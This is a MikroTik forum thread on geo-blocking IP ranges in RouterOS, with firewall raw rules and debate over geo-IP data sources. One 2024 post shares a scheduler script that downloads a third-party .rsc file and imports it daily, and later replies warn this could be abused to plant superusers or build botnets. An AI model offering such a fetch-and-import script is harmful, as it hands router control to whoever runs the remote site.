Community discussions

MikroTik App
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Blocking IP's by region

Tue Dec 19, 2017 5:45 pm

Running OS v6.38, wondering if there is a way to block incoming IP's be region. We have a 3CX system that is constantly blacklisting IP's from foreign countries, and I have worked with other brands of routers that have a geological feature that allows IP's based on location which would help in our situation as the IP's being blacklisted by the VOIP system are all from Europe/Asia/Africa and 99.9% of the legit traffic should be from North America. Anyway to block IP's based on location with my version of OS?
 
User avatar
ZeroByte
Forum Guru
Forum Guru
Posts: 4047
Joined: Wed May 11, 2011 6:08 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 5:54 pm

There's no built-in geo-reference feature in RouterOS.
You will have to use some other source of data to choose your IP ranges and either manually create an address list to your liking, or you can automate it with scripting or BGP distribution.
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 7:52 pm

Sounds like a bit more effort than I and the client would like to put into it. Would be more cost efficient to replace the router with a make/model that supports that feature.
 
jarda
Forum Guru
Forum Guru
Posts: 7756
Joined: Mon Oct 22, 2012 4:46 pm

Re: Blocking IP's by region

Tue Dec 19, 2017 8:21 pm

If it is a feature that is more important than the others, go that way. No need to push mikrotik everywhere by force...
 
arnoldmikro
newbie
Posts: 27
Joined: Sun Apr 14, 2013 5:12 pm
Location: miami fl usa

Re: Blocking IP's by region  [SOLVED]

Wed Dec 20, 2017 12:04 am

https://mikrotikconfig.com/firewall/
see if this is what you are looking for
 
MikeatBdnComputers
just joined
Topic Author
Posts: 4
Joined: Tue Dec 19, 2017 5:39 pm

Re: Blocking IP's by region

Wed Dec 20, 2017 4:36 pm

thanks arnoldmikro, this looks like something that I will use!
 
User avatar
ZeroByte
Forum Guru
Forum Guru
Posts: 4047
Joined: Wed May 11, 2011 6:08 pm

Re: Blocking IP's by region

Thu Dec 21, 2017 2:07 am

Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
 
samoring
just joined
Posts: 7
Joined: Sat Jan 18, 2020 8:24 pm

Re: Blocking IP's by region

Mon Jan 27, 2020 4:26 pm

Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
Is there a way to permit only the dst-address-list=CountryIPBlocks? What I'd like to do is add my "good guys" to CountryIPBlocks, drop all the bad guys, then permit only the good guys.
 
mmmmarcel
just joined
Posts: 1
Joined: Thu May 02, 2019 3:01 pm

Re: Blocking IP's by region

Wed Feb 19, 2020 7:54 pm

How performant is this solution ? Im running here an RBM33G and for germany alone the website generates nearly 10.000 entries. Big impact on routing perfomance ?
 
JAza
newbie
Posts: 34
Joined: Sun Jun 10, 2012 1:07 am

Re: Blocking IP's by region

Fri Jul 02, 2021 12:06 am

Pretty cool link. The firewall syntax they use shows this was designed for a bit older revs of RouterOS, but it will work just fine in modern revs as well. You may also want to cross-check the address lists generated against some other sites with similar lists, because this can change from time to time.

I don't recall whether the IP > Firewall > Raw functionality was introduced by version 6.38 or not - but if it is in your system, you may want to replace the drop rules in the filter with drop rules in RAW (which also prevents blocked hosts from consuming resources in state tracking)

e.g.:
/ip firewall raw add chain=prerouting action=drop src-address-list=CountryIPBlocks
/ip firewall raw add chain=prerouting action=drop dst-address-list=CountryIPBlocks
/ip firewall raw add chain=output action=drop dst-address-list=CountryIPBlocks
Is there a way to permit only the dst-address-list=CountryIPBlocks? What I'd like to do is add my "good guys" to CountryIPBlocks, drop all the bad guys, then permit only the good guys.


This is what seems to be working for me rn..
/ip firewall raw
add action=accept chain=prerouting log-prefix="dropped by geo IP blocked ranges" src-address-list=\
    CountryIPBlocksToAllowToAllow
add action=accept chain=prerouting dst-address-list=CountryIPBlocksToAllowToAllow log-prefix=\
    "dropped by geo IP blocked ranges"
add action=accept chain=output disabled=yes dst-address-list=CountryIPBlocksToAllowToAllow log-prefix=\
    "dropped by geo IP blocked ranges"
add action=drop chain=prerouting comment="Prerouting DENY ALL" log=yes log-prefix=\
    "dropped by geo IP blocked ranges"
add action=drop chain=output comment="Output DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"

Basically flip the "drop" in the above 3 rules into an "accept", then add 2 more rules following - a preroute chain and an output chain with no conditions so they function as a basic "deny all". (and so these must be the bottom 2 rules in the RAW table.)


EDIT to add:
Make sure to add your local LAN IP ranges in the whitelist or you will break any hairpin nats. My solution was two bespoke rules just for the LANs address list so looks like this now:
/ip firewall raw
add action=accept chain=prerouting log-prefix="dropped by geo IP blocked ranges" src-address-list=Local
add action=accept chain=output dst-address-list=Local log-prefix="dropped by geo IP blocked ranges"
add action=accept chain=prerouting log-prefix="dropped by geo IP blocked ranges" src-address-list=\
    CountryIPBlocksToAllowToAllow
add action=accept chain=prerouting dst-address-list=CountryIPBlocksToAllowToAllow log-prefix=\
    "dropped by geo IP blocked ranges"
add action=accept chain=output disabled=yes log-prefix="dropped by geo IP blocked ranges" src-address-list=\
    CountryIPBlocksToAllowToAllow
add action=accept chain=output dst-address-list=CountryIPBlocksToAllowToAllow log-prefix=\
    "dropped by geo IP blocked ranges"
add action=drop chain=prerouting comment="Prerouting DENY ALL" log=yes log-prefix=\
    "dropped by geo IP blocked ranges"
add action=drop chain=output comment="Output DENY ALL" log=yes log-prefix="dropped by geo IP blocked ranges"
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Sat Mar 05, 2022 6:28 pm

https://mikrotikconfig.com/firewall/
see if this is what you are looking for
Please do not use this website! It's not updated properly.
Up to date list of allocations can be downloaded directly from RIPE: http://www.unix-master.com/2013/08/get- ... untry.html
 
holvoetn
Forum Guru
Forum Guru
Posts: 5317
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Blocking IP's by region

Sat Mar 05, 2022 7:33 pm

And info from 2013 is accurate ?
 
404Network
Member Candidate
Member Candidate
Posts: 285
Joined: Wed Feb 16, 2022 2:04 pm

Re: Blocking IP's by region

Sat Mar 05, 2022 7:53 pm

Without any knowledge of the source of information or how current, its basically useless.
Also bots can be setup to be from any country so country blocking is a fallacy to begin with.
All these extra tools eat up CPU and complicate the config so that any issues are hard to find, and in 99% of cases having a drop all rule at the end of input chain and forward chain suffices for the homeowner.
If one is a business, then one may have
a. an edge router in front of the MT
b. a business class ISP connection where the ISP may guarantee up times and protections
c. the MT router is not designed for DDOS attacks and the like,

Also business can pay for services for those edge routers etc..
There are some services available for the MT that are more specific to known bad actors regardless of country and thus more accurate, efficient and up to date.
ex1 - https://axiomcyber.com/mikrotik-support/
ex2 - https://itexpertoncall.com/promotional/ ... l_nat.html ( most cost effective solution for you or your clients IMHO )
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 1:09 am

And info from 2013 is accurate ?
I don't see how the info I posted is inaccurate. It contains a bash snippet which downloads current allocations directly from RIPE's ftp. It builds the download URL using current system date.
You can check RIPE's ftp contents using this http mirror: https://ftp.ripe.net/pub/stats/ripencc/ . As you can see it's being regularly updated.

I spotted the problem, as I got an allocation from RIPE in 2021 which was previously allocated to The Russian Federation. Recently few of my clients decided to block russian IPs and used free tools, like quoted above, to obtain russian allocations. Most of these tools return my ip block as being allocated to Russia.

I agree that this kind of block is probably useless, but people are implementing it. The link I provided shows them how to properly obtain IP assignment data.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 11:48 pm

Without any knowledge of the source of information or how current, its basically useless.
So a solution that pulls data from RIPE is useless, and those two websites which provide payed services with NO source cited are the proper solution?
 
404Network
Member Candidate
Member Candidate
Posts: 285
Joined: Wed Feb 16, 2022 2:04 pm

Re: Blocking IP's by region

Sun Mar 06, 2022 11:54 pm

Without any knowledge of the source of information or how current, its basically useless.
So a solution that pulls data from RIPE is useless, and those two websites which provide payed services with NO source cited are the proper solution?
No I said, the proper solution is for a business ISP account with or without an edge router such that the MT is not involved in such processes.
For the homeowner any of the two services is probably overkill but effective, in particular the second link is not all that expensive and does all the legwork.
As for as RIPE goes, could care less about it. Blocking by country without any other intelligence involved is just a waste of time.
 
savage
Forum Guru
Forum Guru
Posts: 1262
Joined: Mon Oct 18, 2004 12:07 am
Location: Cape Town, South Africa
Contact:

Re: Blocking IP's by region

Fri Mar 11, 2022 10:56 am

I don't see how the info I posted is inaccurate. It contains a bash snippet which downloads current allocations directly from RIPE's ftp. It builds the download URL using current system date.
You can check RIPE's ftp contents using this http mirror: https://ftp.ripe.net/pub/stats/ripencc/ . As you can see it's being regularly updated.
It's as accurate as it's going to get. That data (not only from RIPE, but all the regional RIRs, are used for example for RPKI as well. Yes, they make mistakes sometimes, it happens, but they are the 'authoritive' supplier, as well as maintainer of this data. There are a LOT of things, that depend on this information being accurate (incl. GeoIP databases).

I spotted the problem, as I got an allocation from RIPE in 2021 which was previously allocated to The Russian Federation. Recently few of my clients decided to block russian IPs and used free tools, like quoted above, to obtain russian allocations. Most of these tools return my ip block as being allocated to Russia.
Then as the custodian of that IP Space / ASN, you should be contacting the RIR to correct that. In fact, RIPE has one of the best management web sites that I've seen in a long time relating to IP resources. Chances are, you more than likely could have fixed it yourself too. In fact, I know for a fact that RIPE's database does have a "Country" attribute that can be used on a INET / INET6 object to specifically indicate in which country the IP range is used...

Our prefixes was mistakenly listed in Team CYMR's BOGON lists a few years ago due to a f-up that our local RIR did in these databases. Took me 1 email, and 30 minutes and the entire issue was resolved globally.
 
vinu
newbie
Posts: 42
Joined: Sun Mar 05, 2017 8:09 pm
Location: India

Re: Blocking IP's by region

Fri Mar 11, 2022 5:25 pm

And info from 2013 is accurate ?
hi,
use this
https://www.ip2location.com/free/visitor-blocker
 
tlaguz
just joined
Posts: 7
Joined: Fri Jul 19, 2019 3:31 pm

Re: Blocking IP's by region

Thu Apr 28, 2022 11:48 am

Then as the custodian of that IP Space / ASN, you should be contacting the RIR to correct that. In fact, RIPE has one of the best management web sites that I've seen in a long time relating to IP resources. Chances are, you more than likely could have fixed it yourself too. In fact, I know for a fact that RIPE's database does have a "Country" attribute that can be used on a INET / INET6 object to specifically indicate in which country the IP range is used...

Our prefixes was mistakenly listed in Team CYMR's BOGON lists a few years ago due to a f-up that our local RIR did in these databases. Took me 1 email, and 30 minutes and the entire issue was resolved globally.
The problem was not in RIPE's db, but in mikrotikconfig.com. I had proper "Country" attribute set since I got the allocation. Other sites like ipinfo or various whois websites reported proper country. I mailed ISP Supplies several times and got no response. My prefix however disappeared from the russian list, so they either updated their lists, or removed it manually. I suspect the latter, because now my prefix is absent entirely from their lists.
 
nordscan
just joined
Posts: 4
Joined: Thu May 14, 2020 2:13 pm

Re: Blocking IP's by region

Wed Jan 24, 2024 1:04 am

Script to download current country IP list
change "UK" to your Country code

/system scheduler
add interval=1d name="address_lists_UK" on-event=\
"/tool fetch url=\"http://www.iwik.org/ipcountry/mikrotik/UK\" dst-path=\"UK.rsc\"\r\
\n/delay 10\r\
\n/import file-name=\"UK.rsc\"" policy=read,write,test start-time=startup

credits to https://mrnonaki.net/mikrotik-free-coun ... 654eb659c9
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Blocking IP's by region

Wed Jan 24, 2024 3:19 pm

Script to download current country IP list
[...]
💀⚠️CRITICAL: Never trust who provides scripts containing "/import" from "/tool fetch" from external sources.
viewtopic.php?t=203733#p1051321
 
holvoetn
Forum Guru
Forum Guru
Posts: 5317
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Blocking IP's by region

Wed Jan 24, 2024 3:30 pm

Downloaded that file, looks pretty innocent as it is now but your remark is however very valid.
Anyone controlling that site can put other stuff in that script (or someone gaining control over that place) and then damage is done.

EDIT:
script as it is now:
/log info "Loading UK ipv4 address list"
/ip firewall address-list remove [/ip firewall address-list find list=UK]
/ip firewall address-list
/log info "Loading UK ipv6 address list"
/ipv6 firewall address-list remove [/ipv6 firewall address-list find list=UK]
/ipv6 firewall address-list
Doesn't do a lot ! Which makes me wonder what the real intention is later on ???

For giggles also downloaded BE script, looks valid to me (simply adding a bunch of IP4 and IP6 addresses into an address list).
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 11967
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Blocking IP's by region

Wed Jan 24, 2024 3:38 pm

Precisely...
Trusting something like that is foolish...

Nobody forbids to add on the .rsc instruction to how bypass firewall, create new superuser, do whatever you want with that device...

Let's pretend I create the list,
mischievously I start providing it free for months,
there are even those who start using it without even asking your permission,
at a certain point when the base is large enough, I corrupt everything with the instructions I want and ask for a ransom to unlock the machines...
or use them as a botnet to carry out cyber attacks...

Who is online

Users browsing this forum: Ahrefs [Bot], Bing [Bot], DanMos79 and 60 guests